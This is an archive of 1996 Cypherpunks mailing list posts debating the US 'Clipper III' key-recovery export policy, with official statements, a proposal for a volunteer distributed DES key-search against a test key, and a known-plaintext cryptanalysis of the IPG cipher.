From: Sandy Sandfort <sandfort@crl.com>
Date: Wed, 2 Oct 1996 13:36:24 +0800
To: Dave Temple <dtemple@ashland.edu>
Subject: Re: This list is a joke
In-Reply-To: <Pine.WNT.3.95.961001155921.242D-100000@test1>
Message-ID: <Pine.SUN.3.91.961001140036.18241A-100000@crl.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Tue, 1 Oct 1996, Dave Temple wrote:

> When I subscribed to this list, I thought it would have decent
> communication on worthwhile topics.  I've come to realize
> though that 75% of the messages I receive are from people
> whining like 4 year olds...

We would all do well to remember Sturgen's Rule.  For those of
you who do not know the story, Theodore Sturgen(sp?) is/was a 
noted science fiction writer.  At a science fiction convention
some years back he began a speech by saying, "Ninty percent of
all science fiction is crap!"  

The audience was stunned into absolute silence by his blasphemy.  
After a pause of several beats, Sturgen quietly added, "Ninty
percent of EVERYTHING is crap."

Cypherpunks should take pride in having a crap content of only 
seventy-five percent.  Keep up the good work folks.

> Please take my name off of this list.

You're an adult, Dave.  You'll have to do that yourself (and no
whining, okay?)


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Wed, 2 Oct 1996 02:48:02 +0800
To: Robert Hettinga <rah@shipwright.com>
Subject: Re: e$: NSA Fluffy FUD?
Message-ID: <199610011429.OAA11940@pipe2.ny3.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sep 30, 1996 17:56:39, 'Robert Hettinga <rah@shipwright.com>' wrote: 
 
 
>Anyway, has anyone *else* seen this apocryphal NSA paper yet? Is it on the
web?  
>I'm sure (he said, volunteering someone else's services unasked yet again)
that  
>someone like John Young would be interested in seeing that fax... 
 
 
You bet, and begging for it. 
 
 
Fax: 212-799-4003 (USfA) 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tom Weinstein <tomw@netscape.com>
Date: Wed, 2 Oct 1996 10:14:16 +0800
To: cypherpunks@toad.com
Subject: Re: Clipper III on the table
In-Reply-To: <199610011706.NAA14852@attrh1.attrh.att.com>
Message-ID: <32518E96.7DE1@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Lucky Green wrote:
> 
> Note that the second article stated that the administration will allow
> the use of stronger cypto than 56 bit once GAK is in place. If this is
> true, much of the current industry resistance is likely to evaporate.
> Even the promise might suffice.

Don't bet on it.

-- 
You should only break rules of style if you can    | Tom Weinstein
coherently explain what you gain by so doing.      | tomw@netscape.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 2 Oct 1996 11:06:04 +0800
To: stewarts@ix.netcom.com
Subject: Re: Clipper III on the table
In-Reply-To: <199610011706.NAA14852@attrh1.attrh.att.com>
Message-ID: <199610011844.OAA02818@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



stewarts@ix.netcom.com writes:
> Hip Hip Hooray!  Clinton will finally let us use _some_
> 20+year-old encryption code, which has been known to be relatively
> weak for 15 years, as long as we give them all our keys!  What a guy!

I personally don't mind forcing escrow of 56 bit keys so long as
people can use 128 bit keys without escrow. >:-)

> I assume he's partly doing this to make a big "See, I'm in favor
> of high-tech trade and crime-fighting" push in time for the election,
> and unlike RC4/40, cracking DES on general-purpose processors
> _is_ a big enough job that probably can't do a distributed crack
> in two weeks.

We really have to work on cracking DES at least once -- it would
substantially reduce the wind in the Administration's sails.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Wed, 2 Oct 1996 11:08:12 +0800
To: cypherpunks@toad.com
Subject: White House crypto proposal -- too little, too late
Message-ID: <Pine.GSO.3.95.961001145707.23810F-100000@well.com>
MIME-Version: 1.0
Content-Type: text/plain




---------- Forwarded message ----------
Date: Tue, 1 Oct 1996 14:56:21 -0700 (PDT)
From: Declan McCullagh <declan@well.com>
To: fight-censorship@vorlon.mit.edu
Subject: White House crypto proposal -- too little, too late

I just got back from the White House, where Gore's office held a
roundtable plugging the administration's long-awaited and already
widely-derided Return of Clipper proposal.

Gore announced that jurisdiction over crypto exports would move to the
Commerce Dept; that the export embargo on 56-bit DES would be lifted
in part for two years only; that to be approved for export firms must
submit a detailed proposal describing how they will move towards key
escrow; that the new regulations would go into effect on January 1.

The true problem with this plan is that 56-bit DES is woefully
inadequate.  But much of the media coverage I've read of the plan
doesn't even mention that. Take Elizabeth Corcoran's article, which
ran above the fold on the front page in today's Washington Post. (It's
what almost certainly prompted Gore's office to move the announcement
to today rather than hold it later this week.)

The thrust of the article is that the administration's new proposal
balances the needs of privacy, business, and law enforcement. But it
doesn't. The Feds, foreign governments, and determined attackers can
crack anything encrypted with 56-bit DES -- the strongest crypto that
can be exported under the plan. This vital fact appears nowhere in the
Post article.

That's why Bruce Schneier, author of Applied Cryptography, recommends
against using DES in favor of a more secure algorithm. According to
Schneier: "A brute-force DES-cracking machine [designed by Michael
Wiener] that can find a key in an average of 3.5 hours cost only $1
million in 1993."

More recently, in January 1996 an ad hoc group of renowned
cryptographers including Matt Blaze, Whitfield Diffie, Ronald Rivest
and Schneier, released a report going even further. They said: "To
provide adequate protection against the most serious threats -
well-funded commercial enterprises or government intelligence agencies
- keys used to protect data today should be at least 75 bits long. To
protect information adequately for the next 20 years in the face of
expected advances in computing power, keys in newly-deployed systems
should be at least 90 bits long."

What's even more disturbing is what the administration might do
next. After the roundtable broke up, I chatted with Michael Vadis, one
of the assistant deputy attorneys general who oversees national
security issues. He said an international consensus is forming that
terrorists can use crypto; therefore crypto must be controlled. The
U.S. is certainly pushing this line at the OECD talks.

"But it just takes one country to decide to export strong crypto," I said.

"You're missing something," said Vadis.

"What?" I asked. "Unless you're talking about import restrictions."

"Exactly," he said.

-Declan

*******

Some background:

   Linkname: Brock Meeks on White House plan -- 6 Sep 96
   Filename: http://www.muckraker.com/muckraker/96/36/index4a.html

********

http://www.washingtonpost.com/wp-srv/WPlate/1996-10/01/041L-100196-idx.html

U.S. TO EASE ENCRYPTION RESTRICTIONS

Privacy Advocates Wary of Proposal For Software Exports

   By Elizabeth Corcoran
   Washington Post Staff Writer
   Tuesday, October 1 1996; Page A01
   The Washington Post

   The Clinton administration is cutting off an emotional four-year-old
   debate with the computer industry over the export of
   information-scrambling technology with a plan that it says will help
   U.S. companies boost sales overseas and still allow law enforcement
   agencies to unscramble messages, officials said yesterday.

   President Clinton has decided to sign an executive order that changes
   the rules restricting the overseas sale of the technology, the
   officials said. Although the full details of the plan had yet to be
   revealed, privacy advocates and some industry executives contended
   that it would be difficult to put into practice.

   Under current rules, companies can sell only relatively easy-to-crack
   scrambling technology. Under the plan, they would get permission to
   export somewhat more sophisticated versions of the software and
   hardware, which prevents eavesdroppers from looking at information.

   The issue has caused enormous friction between the government and
   computer industry and privacy groups, which contend that keeping any
   restrictions in place will harm the protection of personal information
   everywhere and slow the development of on-line commerce, which relies
   on keeping credit card numbers and other sensitive information secure.

   The administration counters that it has come a long way in meeting
   such objections. However, last night some companies and privacy
   advocates were still worried that the constraints will leave U.S.
   companies at a disadvantage abroad and will not ensure that
   individuals will be able to protect their communications.

   The government's plan preserves what has been its unnegotiable
   cornerstone since the debate began in the early day of the Clinton
   administration -- that law enforcement officials must have the means
   for peeking at encrypted information when they are properly equipped
   with court authorization.

   Earlier versions of the plan tightly limited what kinds of technology
   could be sold abroad. They also called for makers of encryption
   technology to deposit "keys" with approved third parties so that law
   enforcement authorities could decode material. The new plan doesn't
   specify who would have the keys.

   Last night, several companies, led by International Business Machines
   Corp., said they have a technical plan that they believe could comply
   with the new rules on keys.

[...]
   
   Industry officials say they ultimately want to be able to use the most
   sophisticated encryption technology available. "It's really critical
   to doing business around the world," said an IBM source. "But
   governments exist. It's a balancing act . . . to satisfy the needs of
   the governments and make sure that markets and individuals trust the 
   integrity of what's being sent over the networks."             

[...]














From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: barina man <westo@bssc.edu.au>
Date: Tue, 1 Oct 1996 15:22:17 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <1.5.4.32.19961001050008.006b2df4@172.24.1.5>
MIME-Version: 1.0
Content-Type: text/plain


unsubcribe cypherpunks@toad.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rick Smith <smith@SCTC.COM>
Date: Wed, 2 Oct 1996 10:31:21 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: How might new GAK be enforced?
Message-ID: <199610012103.QAA26604@shade.sctc.com>
MIME-Version: 1.0
Content-Type: text/plain


Tim May asks:

: Any other ideas on how the government plans to enforce GAK, to make GAK the
: overwhelmingly-preferred solution?

The problem seems somewhat analogous to the software copy protection
problem and maybe the enfocement will be similar: make "examples" of a
few high profile offenders who are exchanging blatantly un-GAKed
traffic with foreigners. This assumes they fine tune the law to make
such behavior illegal without having to prove you yourself exported
the stuff to them. Wonder what the Supremes will say to that.

But that's not the end of the story. If there is lots of GAK encrypted
traffic flowing about, then encrypted traffic in general is no longer
noteworthy. So as long as your traffic looks like GAK, you won't be
hassled until they try to read your traffic.

So it's possible that products will appear that use pseudo-GAK
protocols -- they look just like their GAKed cousins but the GAK
fields contain plausiable garbage instead of keys. It could even
turn out to be a vendor "quality control" thing -- oops, the GAK
was supposed to work but...

You couldn't do that with Clipper (except via Matt Blaze's brute
forcing of the LEAF checksum) because the crypto wouldn't decrypt a
packet with an invalid LEAF checksum. Since it was a sealed hardware
module, implementers had no choice but to play by those rules. There's
no such enforcable limitation on commercial software implementations.

Rick.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Temple <dtemple@ashland.edu>
Date: Wed, 2 Oct 1996 09:37:52 +0800
To: cypherpunks@toad.com
Subject: This list is a joke
Message-ID: <Pine.WNT.3.95.961001155921.242D-100000@test1>
MIME-Version: 1.0
Content-Type: text/plain


When I subscribed to this list, I thought it would have decent
communication on worthwhile topics.  I've come to realize though that 75%
of the messages I receive are from people whining like 4 year olds.  I am
making a huge assumption in saying that most of the people on this list
are adults.  It is time to start acting like it.

Please take my name off of this list.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@netcom.com>
Date: Wed, 2 Oct 1996 10:51:32 +0800
To: Tom Weinstein <tomw@netscape.com>
Subject: Re: Clipper III on the table
In-Reply-To: <32518E96.7DE1@netscape.com>
Message-ID: <Pine.3.89.9610011613.A7805-0100000@netcom14>
MIME-Version: 1.0
Content-Type: text/plain





On Tue, 1 Oct 1996, Tom Weinstein wrote:

> Lucky Green wrote:
> > 
> > Note that the second article stated that the administration will allow
> > the use of stronger cypto than 56 bit once GAK is in place. If this is
> > true, much of the current industry resistance is likely to evaporate.
> > Even the promise might suffice.
> 
> Don't bet on it.

Allow me to say here that I do not belive that Netscape will be amongst 
those fooled so easily. But IBM, HP, TIS, and others have already been 
fooled. The USG does not need to get every software company to agree with 
their proposal. Divide and conquer. Seems that the USG has done a 
marvelous job of D&C so far.

--Lucky




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: abd@cdt.org (Alan Davidson)
Date: Wed, 2 Oct 1996 11:47:05 +0800
To: cypherpunks@toad.com
Subject: White House Statement on Clipper 3.11
Message-ID: <v02140b02ae77235ea526@[204.157.127.11]>
MIME-Version: 1.0
Content-Type: text/plain



Included below for your viewing pleasure is the Administration's latest
encryption proposal, released at a White House briefing this afternoon.

This statement, and more information including CDT's forthcoming analysis
of the proposal, are available at:

        http://www.cdt.org/crypto
        http://www.crypto.com



Alan Davidson, Staff Counsel                 202.637.9800 (v)
Center for Democracy and Technology          202.637.0968 (f)
1634 Eye St. NW, Suite 1100                  <abd@cdt.org>
Washington, DC 20006                         PGP key via finger


----------------

THE WHITE HOUSE
Office of the Vice President

FOR IMMEDIATE RELEASE
CONTACT:  456-7035
TUESDAY, October 1, 1996

STATEMENT OF THE VICE PRESIDENT

President Clinton and I are committed to promoting the growth of electronic
commerce and robust, secure communications worldwide while protecting the
public safety and national security.  To that end, this Administration is
consulting with Congress, the information technology industry, state and
local law enforcement officials, and foreign governments on a major
initiative to liberalize export controls for commercial encryption
products.

The Administration's initiative will make it easier for Americans to use
stronger encryption products -- whether at home or abroad -- to protect
their privacy, intellectual property and other valuable information.  It
will support the growth of electronic commerce, increase the security of
the global information, and sustain the economic competitiveness of U.S.
encryption product manufacturers during the transition to a key management
infrastructure.

Under this initiative, the export of 56-bit key length encryption products
will be permitted under a general license after one-time review, and
contingent upon industry commitments to build and market future products
that support key recovery.  This policy will apply to hardware and software
products.  The relaxation of controls will last up to two years.

The Administration's initiative recognizes that an industry-led technology
strategy will expedite market acceptance of key recovery, and that the
ultimate solution must be market-driven.

Exporters of 56-bit DES or equivalent encryption products would make
commitments to develop and sell products that support the key recovery
system that I announced in July.  That vision presumes that a trusted party
(in some cases internal to the user's organization) would recover the
user's confidentiality key for the user or for law enforcement officials
acting under proper authority.  Access to keys would be provided in
accordance with destination country policies and bilateral understandings.
No key length limits or algorithm restrictions will apply to exported key
recovery products.

Domestic use of key recovery will be voluntary, and any American will
remain free to use any encryption system domestically.

The temporary relaxation of controls is one part of a broader encryption
policy initiative designed to promote electronic information security and
public safety.  For export control purposes, commercial encryption products
will no longer be treated as munitions.  After consultation with Congress,
jurisdiction for commercial encryption controls will be transferred from
the State Department to the Commerce Department.  The Administration also
will seek legislation to facilitate commercial key recovery, including
providing penalties for improper release of keys, and protecting key
recovery agents against liability when they properly release a key.

As I announced in July, the Administration will continue to expand the
purchase of key recovery products for U.S. government use, promote key
recovery arrangements in bilateral and multilateral discussions, develop
federal cryptographic and key recovery standards, and stimulate the
development of innovative key recovery products and services.

Under the relaxation, six-month general export licenses will be issued
after one-time review, contingent on commitments from exporters to explicit
benchmarks and milestones for developing and incorporating key recovery
features into their products and services, and for building the supporting
infrastructure internationally.  Initial approval will be contingent on
firms providing a plan for implementing key recovery.  The plan will
explain in detail the steps the applicant will take to develop, produce,
distribute, and/or market encryption products with key recovery features.
The specific commitments will depend on the applicant's line of business.

The government will renew the licenses for additional six-month periods if
milestones are met.  Two years from now, the export of 56-bit products that
do not support key recovery will no longer be permitted.  Currently
exportable 40-bit mass market software products will continue to be
exportable.  We will continue to support financial institutions in their
efforts to assure the recovery of encrypted financial information.  Longer
key lengths will continue to be approved for products dedicated to the
support of financial applications.

The Administration will use a formal mechanism to provide industry, users,
state and local law enforcement, and other private sector representatives
with the opportunity to advise on the future of key recovery.  Topics will
include:

evaluating the developing global key recovery architecture
assessing lessons-learned from key recovery implementation
advising on technical confidence issues vis-a-vis access to and release of keys
addressing interoperability and standards issues
identifying other technical, policy, and program issues for governmental action.

The Administration's initiative is broadly consistent with the recent
recommendations of the National Research Council.  It also addresses many
of the objectives of pending Congressional legislation.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Wed, 2 Oct 1996 05:18:56 +0800
To: cypherpunks@toad.com
Subject: Re: ASAP letter on e-cash
Message-ID: <199610011624.QAA08162@pipe1.ny2.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   Forbes, ASAP, October 7, 1996, p. 18. 
 
 
   Bankrupt the Bureaucrats! 
 
 
   Eugene Ludwig's principal concern ["The Money Changers," 
   August 26] is not counterfeiting, theft, or fraud: Those 
   crimes have victims, and regulators are never concerned 
   with victim crimes. 
 
   As comptroller of currency, he is worried sick about tax 
   evasion (i.e., avoidance) and money laundering because he 
   knows that technology like Chaum's Ecash could put him 
   and his entire bureaucracy out of their cushy jobs, 
   regardless of the actions of the executive branch or 
   Congress. 
 
   Counterfeiting a $100 bill, even one of the new ones, is 
   easier than counterfeiting one of David Chaum's Ecash 
   payments, and the previous level of government "concern" 
   regarding offshore counterfeiting of $100 bills is 
   instructive here (they let it go on for years!!). 
 
   Some in government have gotten a clue by osmosis, such as 
   Senator Conrad Burns (R-Mont.), but the damage is already 
   done. My solution: Vote Libertarian! 
 
   Jim Ray 
   liberty@gate.net 
   [Right E-steamed Cypherpunk] 
 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Wed, 2 Oct 1996 12:08:36 +0800
To: cypherpunks@toad.com
Subject: Can we kill single DES?
Message-ID: <199610012026.NAA28151@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Since it looks like the US government will be allowing the export of 
56 bit espionage-enabled software, it's time to kill single DES.

As some of you will recall, a while back I wondered aloud about the
feasibility of brute-forcing DES on general purpose machines, ala the
RC4-40 crack last year. 

Unlike many cypherpunks, I actually write code (:-). I took Phil
Karn's DES386 as a starting point, and modified it to run effiiciently
on the Pentium. The code I've written will run 14 round DES (all
that is required for a key test app) at 254,000 crypts/sec on a
90 MHz Pentium.  

Allow about 10% overhead for key scheduling (there are some tricks to
speed this up), and we're still at about 250,000 keys/sec on a 100MHz
Pentium (I'm using a nominal 100 MHz Pentium as my 'unit' of
cpu power).  On a Pentium, it runs entirely in the L1 cache.  The code 
will also run on a 486, but at less than half the number of crypts/sec 
for the same clock speed.

On this type of processor, it would still take 9133 years to exhaust 
a 56 bit key space. On the other hand, on 20,000 processors of this
power it would take less than 6 months. If the target is encrypted
in a chaining mode with an unknown 8 byte IV, the time more than 
doubles. 

Clearly, this goes far beyond the number of cpus available to the 
members of this list (though well within the power of most governments
and  many corporations)

The best idea I've heard for recruiting this many cpu cycles is to create
a screen saver which does DES-cracking while machines are idle.
Another incentive is to offer a cash prize to the person(s) who find the
key.

Yes, I KNOW that a hardware based cracker is a LOT more efficient,
but between the up-front cost and the difficulty of design and production,
it's less likely to get done.  (Still if someone wants to buy me a nice
FPGA board, I'll see what I can do).

If you're interested in volunteering machines to do a key search, please
read to the end.

Questions for general discussion:

1. Is this a good idea? What will happen if DES becomes perceived
    as insecure?
2. What is the probability of success required to make it worth doing?
3. What would be the consequences of failure?
4. What other platforms than NT/Win95/Pentium should be considered?
   I could write a Unix demon version, but unless it's tailored for the 
   cpu, a lot of efficency is lost
   (The aggregate number of idle cycles available for testing is the 
  crucial number).
5. What's a good target? Ideally, we need a plaintext/ciphertext pair,
   encrypted in Single DES ECB mode. Preferably from a commercially
   available program, in which a single key is used for a great deal
   of traffic over a long period. I would strongly prefer, however, that 
   the target key be a  *test* key - I don't want to compromise 
   anyone's actual security.
   We need a target which is both convincing and realistic.
6. What other incentives can be used to recruit machines?
------------------------------
If you're interested in volunteering cycles:

RESPOND ONLY TO ME (trei@process.com), NOT TO THE LIST.  The 
last thing we need is a hundred 'I'll help' messages on the list.

Assume that the program will be a Win95/NT screen saver or 
Unix deamon. Think about how many machines you could get 
it to run on (maybe you can talk other people into installing
it as a screen saver or background task)

I have not written the screen saver yet. I will not do so unless it looks 
like we'lll get enough machines, so nothing is likely to happen for 
a couple of months at least.

I need to estimate how many cpu cycles will be available:

Calculate:

Number of Pentiums * Hours available/week * MHz
+
(Number of 486's * Hours available/week * MHz * 0.30)

For, Alphas, MIPS, Motorola, PowerPC etc, running UN*X, MAC, etc, 
just report how many cpus,  their speed, and OS - I'll need help to 
get versions for other platfoms. 64 bit processors like the Alpha
can run this stuff *fast*.

Send the aggregate numbers to me. I'll also need to know how many 
machines are directly on the Internet and could thus query a 
key-space server, and how many would need some other 
mechanism to get keyspace and report results. If you're volunteering
machines which are outside of the US/Canada, please note the fact:
ITAR may be an issue here.

 I'll summarize to the list.

Peter Trei
trei@process.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Wed, 2 Oct 1996 05:07:59 +0800
To: cypherpunks@toad.com
Subject: LEO_rat
Message-ID: <199610011627.QAA08284@pipe1.ny2.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   10-1-96. WaPo: 
 
   "U.S. to Ease Encryption Restriction." Page One lead. 
 
      Sources at IBM say scientists there have devised a 
      scheme that uses several steps to encrypt information 
      and the keys for unlocking it. Law enforcement officials 
      authorized to unscramble information would not get a key 
      for unlocking a message but instead the instructions for 
      how to break open a specific encrypted message. 
 
   ----- 
 
   http://jya.com/leorat.txt 
 
   LEO_rat 
 
   ----- 
 
   For an earlier report on IBM's LEO-rat, see 
 
   http://jya.com/ibmgak.txt 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steven L Baur <steve@miranova.com>
Date: Wed, 2 Oct 1996 11:56:15 +0800
To: cypherpunks@toad.com
Subject: Re: Anonymous: Re: Phoenix News
In-Reply-To: <199610010137.VAA23410@jekyll.piermont.com>
Message-ID: <m2raniutwl.fsf@deanna.miranova.com>
MIME-Version: 1.0
Content-Type: text/plain


>>>>> "Ralph" == Donald ``Ralph'' Wood writes to Perry Metzger:

Ralph> I do not object to criticism,  when I am wrong, but I do
Ralph> object to using just highly subjective opinions to attack me,
Ralph> or anyone for that matter.

The same Ralph of IPG who offered an unbreakable system or they would
sell the company for $1?

		     [Repost from March 19, 1996]
Return-Path: owner-cypherpunks@toad.com
Received: from relay3.UU.NET (relay3.UU.NET [192.48.96.8]) by deanna.miranova.com (8.7.3/8.6.9) with ESMTP id TAA01777 for <steve@miranova.com>; Tue, 19 Mar 1996 19:52:42 -0800
Received: from toad.com by relay3.UU.NET with SMTP 
	id QQahuk09205; Tue, 19 Mar 1996 22:31:17 -0500 (EST)
Received: by toad.com id AA29880; Tue, 19 Mar 96 09:32:18 PST
Received: from pangaea.hypereality.co.uk by toad.com id AA29874; Tue, 19 Mar 96 09:32:09 PST
Received: (from remail@localhost) by pangaea.hypereality.co.uk (8.6.9/8.6.9)
	id RAA17262 for cypherpunks@toad.com; Tue, 19 Mar 1996 17:32:47 GMT
	Hypereality Systems : <WWW: http://www.hypereality.co.uk/>
Date: Tue, 19 Mar 1996 17:32:47 GMT
Message-Id: <199603191732.RAA17262@pangaea.hypereality.co.uk>
To: cypherpunks@toad.com
From: cpunk@remail.ecafe.org (ECafe Anonymous Remailer)
Subject: IPG cracked with known plaintext
Remailed-By: ECafe Anonymous Remailer
Complaints-To: complaints@remail.ecafe.org
X-Www: http://www.ecafe.org/~remail/
X-Notice: The contents of this message are neither appoved or
X-Notice: condoned by ecafe.org or our host Hypereality Systems.
X-Notice: We bear no liability for misuse of this system.
X-Warn: *** This message was remailed through an anonymous remailer ***
X-Warn:  *** Replying to it will not send your reply to the sender ***
Sender: owner-cypherpunks@toad.com
Precedence: bulk
Lines: 77
Xref: deanna.miranova.com cypherpunks:199

This information is preliminary and is based on an attempt to
understand the IPG algorithm information.  That description is not
clear in some areas, however, hence this analysis is tentative at this
time.

First let us describe the IPG system in more conventional C:

a[0] to a[63] are initialized to random 8-bit values.  (The
description is unclear and almost makes it sound like they are
initialized to a random 8-bit value anded with 0x3500, which would of
course be zero.  The attack below will assume that this bizarre step
is not done, but will still apply even if it is.)

b[0] to b[63] are initialized to random primes selected from some
pool.  c[0] to c[63] are also initialized to random primes selected
from a different pool.

d is initialized to a random 8 bit value.

The algorithm is:

    for ( ; ; ) {
	for (i=0; i<63; i++) {
	    a[i] = (a[i] + b[i]) % c[i];
	    d = (d + a[i]) & 255;
	    *data++ ^= d;		/* xor with data */
	}
    }


Note first that with a known plaintext attack, the value of d can be
calculated for each iteration, simply by xor'ing the plaintext and
ciphertext.  So we can easily recover a series of d values under this
assumption.  Known plaintext is a plausible cryptographic assumption
in many contexts.

Note second that we can assume that b[i] is less than c[i].  It
appears from the description that this will be true, although it is a
little unclear.  If b[i] is greater than c[i] then simply do
b[i] = b[i] % c[i] before beginning the loop.  This will produce the
same results since (a + (b mod c)) mod c is equal to (a + b) mod c.

Note third that when a[i] and b[i], both less than c[i], are added mod
c[i], the result will be equal to one of two things: a[i]+b[i], or
a[i]+b[i]-c[i].  The reason is that the sum a[i]+b[i] must be less
than 2*c[i] so the "mod" operation will be at most a single
subtraction of c[i].  In general, half the time it will be necessary
to subtract c[i], and half the time it will not.

Now, as mentioned above, with known plaintext we can deduce the series
of d values.  Since each d differs from its predecessor by adding
a[i], this allows us to calculate the low 8 bits of a[i] simply by
taking the difference between successive d's.

Every 64 bytes, i repeats.  We know the low byte of a[i] from the
previous iteration, and we know it for this iteration.  Half of the
time (on average) a[i] will change simply by adding b[i], in which
case the low 8 bits will change by exactly the low 8 bits of b[i].  So
if we take the difference between a[i] values spaced 64 bytes apart,
half of the time these values will be a constant which is equal to the
low byte of b[i].

The other half the time, the low 8 bits will change by adding b[i] and
subtracting c[i].  So the low 8 bits of (b[i]-c[i]) is the other
possible constant value which will be seen when you take the
difference of a[i] every 64 bytes.

So with a few multiples of 64 bytes of known plaintext, you will
quickly find all the possible b[i] and b[i]-c[i] low bytes. By itself
this should significantly narrow down the possibilities for b[i] and
c[i], in many cases to a single prime.  Even without this the
algorithm can now be run forward or backward with only two possible
known changes to a[i] at each step, and the entire message can be
easily deduced.

So this algorithm is easily broken with known plaintext.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 2 Oct 1996 09:13:16 +0800
To: Dave Temple <dtemple@ashland.edu>
Subject: Re: This list is a joke
In-Reply-To: <Pine.WNT.3.95.961001155921.242D-100000@test1>
Message-ID: <199610012050.QAA03562@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Dave Temple writes:
> When I subscribed to this list, I thought it would have decent
> communication on worthwhile topics.  I've come to realize though that 75%
> of the messages I receive are from people whining like 4 year olds.

True enough.

> Please take my name off of this list.

Never.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jseiger@cdt.org (Jonah Seiger)
Date: Wed, 2 Oct 1996 10:08:30 +0800
To: cypherpunks@toad.com
Subject: Sen. Leahy's Statement on Clipper 3.1.1
Message-ID: <v02140b10ae7734397c63@[204.157.127.4]>
MIME-Version: 1.0
Content-Type: text/plain


        STATEMENT OF SENATOR LEAHY ON THE
        ADMINISTRATION'S NEW ENCRYPTION INITIATIVE
                                October 1, 1996

        The timing of the Administration's announcement on encryption,
     within hours of the Congress' likely adjournment, is unfortunate.
     The Administration needs to work with Congress to develop a
     consensus on a national encryption policy that takes account of
     the privacy, law enforcement and competitiveness concerns of our
     Nation's citizens and businesses.

        Taking unilateral steps will not resolve this issue, but
     instead could delay building the consensus we so urgently need.
     This issue simply cannot by resolved by Executive fiat.

        While technology should not dictate policy, particularly when
     our public safety and national security interests are at issue,
     any policy we adopt must protect our privacy.  As the
     Administration and industry rush to find an alternative to
     unbreakable encryption, they should take heed that any solution
     which fails to protect the Fourth Amendment and privacy rights of
     our citizens will be unacceptable.

        That is why, with bipartisan support, Senator Burns and I
     introduced legislation in March that set out privacy safeguards
     to protect the decoding keys to encrypted communications and
     stringent legal procedures for law enforcement agencies to get
     access to those keys.

        In this plan, the Administration is directing the resources of
     our high-tech industry to develop breakable, rather than
     unbreakable, encryption. But no one is yet clear about who will
     be legally allowed to break into encrypted messages, and under
     what circumstances. These are questions that have to be answered
     not only with our own government but also with foreign
     governments.  The weakest link in a key recovery system may be
     the country with the weakest privacy protections. Internet users,
     who can send messages around the globe seamlessly, do not want
     the privacy of their encrypted communications to be at the mercy
     of a country that ignores the Fourth Amendment principles we
     enjoy here.

        These are significant privacy and security concerns not
     answered by the Administration's plan.

        Even without reading the fine print, the general outline of
     the Administration's plan smacks of the government trying to
     control the marketplace for high-tech products. Only those
     companies that agree to turn over their business plans to the
     government and show that they are developing key recovery
     systems, will be rewarded with permission to sell abroad products
     with DES encryption, which is the global encryption standard.

        Conditioning foreign sales of products with DES on development
     of key recovery systems puts enormous pressure on our computer
     industry to move forward with key recovery, whether their
     customers want it or not.

         Internet users themselves -- not the FBI, not the NSA, not
     any government regulator -- should decide what encryption method
     best serves their needs. Then the marketplace will be able to
     respond. The Administration is putting the proverbial cart before
     the horse, by putting law enforcement interests ahead of every
     one elses.

        But that is not the only catch in the Administration's plan.
     Permission to export DES will end in two years. Allowing American
     companies to sell DES overseas is a step long overdue. Given the
     fact that a Japanese company is already selling "triple DES", one
     might say this step is too little, too late. Threatening to pull
     the plug on DES in two years, when this genie is already out of
     the bottle, does not promote our high-tech industries overseas.
     Does this mean that U.S. companies selling sophisticated computer
     systems with DES encryption overseas must warn their customers
     that the supply may end in two years? Customers both here and
     abroad want stable suppliers, not those jerked around by their
     government.

        The most effective way to protect the privacy and security of
     our on-line communications is to use encryption technology. Every
     American should be concerned about our country's policy on
     encryption since the resolution of this debate will affect
     privacy, jobs and the competitiveness of our high-tech
     industries.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@netcom.com>
Date: Wed, 2 Oct 1996 11:15:22 +0800
To: Peter Trei <trei@process.com>
Subject: Re: Can we kill single DES?
In-Reply-To: <199610012026.NAA28151@toad.com>
Message-ID: <Pine.3.89.9610011638.A7805-0100000@netcom14>
MIME-Version: 1.0
Content-Type: text/plain





On Tue, 1 Oct 1996, Peter Trei wrote:

> Since it looks like the US government will be allowing the export of 
> 56 bit espionage-enabled software, it's time to kill single DES.
> 
> As some of you will recall, a while back I wondered aloud about the
> feasibility of brute-forcing DES on general purpose machines, ala the
> RC4-40 crack last year. 
[...]

> Yes, I KNOW that a hardware based cracker is a LOT more efficient,
